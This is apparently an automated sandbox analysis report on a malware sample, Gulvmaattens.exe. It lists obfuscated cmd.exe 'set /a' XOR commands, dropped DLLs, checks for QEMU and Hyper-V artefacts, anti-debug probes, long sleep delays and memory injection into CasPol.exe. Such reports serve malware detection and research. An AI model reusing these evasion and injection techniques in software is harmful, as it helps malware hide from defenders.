          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x1F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x75^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA8249 push ebx; iretd
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA6259 push cs; ret
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA2C71 push ds; retf
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA1D56 push edx; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_00E2142F push edi; retn 0000h
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_00E2BEE8 push es; retn 00E2h
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_1CFDC5DB push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_1CFDC5AB push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_1CFDC63B push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_1CFDC62B push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_1CFDC61B push eax; ret
          Source: vfslog.dll.1.drStatic PE information: section name: .xdata
          Source: vfslog.dll.1.drStatic PE information: section name: /4
          Source: vfslog.dll.1.drStatic PE information: section name: /19
          Source: vfslog.dll.1.drStatic PE information: section name: /31
          Source: vfslog.dll.1.drStatic PE information: section name: /45
          Source: vfslog.dll.1.drStatic PE information: section name: /57
          Source: vfslog.dll.1.drStatic PE information: section name: /70
          Source: vfslog.dll.1.drStatic PE information: section name: /81
          Source: vfslog.dll.1.drStatic PE information: section name: /92
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_71401B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
          Source: sqmapi.dll.1.drStatic PE information: 0xCBF26285 [Sun Jun 5 13:03:01 2078 UTC]
          Source: C:\Users\user\Desktop\Gulvmaattens.exeFile created: C:\Users\user\AppData\Local\Temp\nskEE19.tmp\nsExec.dllJump to dropped file
          Source: C:\Users\user\Desktop\Gulvmaattens.exeFile created: C:\Users\user\Falder99\Interelectrode\Overvejendes\sqmapi.dllJump to dropped file
          Source: C:\Users\user\Desktop\Gulvmaattens.exeFile created: C:\Users\user\Falder99\Interelectrode\Overvejendes\vfslog.dllJump to dropped file
          Source: C:\Users\user\Desktop\Gulvmaattens.exeFile created: C:\Users\user\AppData\Local\Temp\nskEE19.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x78^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x76^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x61^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x7D^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x76^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x7F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x00^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x01^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x09^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x09^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Users\user\Desktop\Gulvmaattens.exeFile opened: C:\Program Files\qga\qga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
          Source: Gulvmaattens.exe, 00000001.00000002.51585083450.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOKERNELBASE.DLLSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
          Source: Gulvmaattens.exe, 00000001.00000002.51585083450.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
          Source: Gulvmaattens.exe, 00000001.00000002.51583404084.00000000006E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEP
          Source: Gulvmaattens.exe, 00000001.00000002.51583832661.0000000000718000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE/
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4460Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Gulvmaattens.exeDropped PE file which has not been started: C:\Users\user\Falder99\Interelectrode\Overvejendes\sqmapi.dllJump to dropped file
          Source: C:\Users\user\Desktop\Gulvmaattens.exeDropped PE file which has not been started: C:\Users\user\Falder99\Interelectrode\Overvejendes\vfslog.dllJump to dropped file
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA1AA2 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9934
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_0040676F FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_00405B23 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_00402902 FindFirstFileW,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Gulvmaattens.exeSystem information queried: ModuleInformation
          Source: C:\Users\user\Desktop\Gulvmaattens.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\Gulvmaattens.exeAPI call chain: ExitProcess graph end node
          Source: Gulvmaattens.exe, 00000001.00000002.51585532626.00000000046F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
          Source: Gulvmaattens.exe, 00000001.00000002.51585532626.00000000046F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: Gulvmaattens.exe, 00000001.00000002.51585532626.00000000046F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
          Source: Gulvmaattens.exe, 00000001.00000002.51585532626.00000000046F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: Gulvmaattens.exe, 00000001.00000002.51583832661.0000000000718000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe/
          Source: Gulvmaattens.exe, 00000001.00000002.51585532626.00000000046F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
          Source: Gulvmaattens.exe, 00000001.00000002.51585532626.00000000046F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
          Source: Gulvmaattens.exe, 00000001.00000002.51585532626.00000000046F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
          Source: CasPol.exe, 0000008F.00000002.55914326721.0000000000F48000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000008F.00000003.52495782074.0000000000FA5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: Gulvmaattens.exe, 00000001.00000002.51585083450.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: Gulvmaattens.exe, 00000001.00000002.51585532626.00000000046F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
          Source: Gulvmaattens.exe, 00000001.00000002.51583404084.00000000006E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exep
          Source: Gulvmaattens.exe, 00000001.00000002.51585532626.00000000046F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
          Source: Gulvmaattens.exe, 00000001.00000002.51585532626.00000000046F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
          Source: Gulvmaattens.exe, 00000001.00000002.51585532626.00000000046F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
          Source: Gulvmaattens.exe, 00000001.00000002.51585083450.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoKERNELBASE.DLLshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_71401B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA1AA2 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AAFDCF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AABDD1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AB3510 LdrLoadDll,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Users\user\Desktop\Gulvmaattens.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: B00000
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x78^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x76^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x61^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x7D^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x76^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x7F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x00^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x01^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x09^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x09^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x70^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x41^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x56^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x56^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x75^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5A^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x56^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x72^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x1B^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5E^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x78^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x41^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x07^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x1F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x75^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5A^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x56^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x72^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x1B^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5E^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x78^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x41^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x07^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x1F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x75^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5A^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x56^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x72^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x1B^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5E^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x78^51"
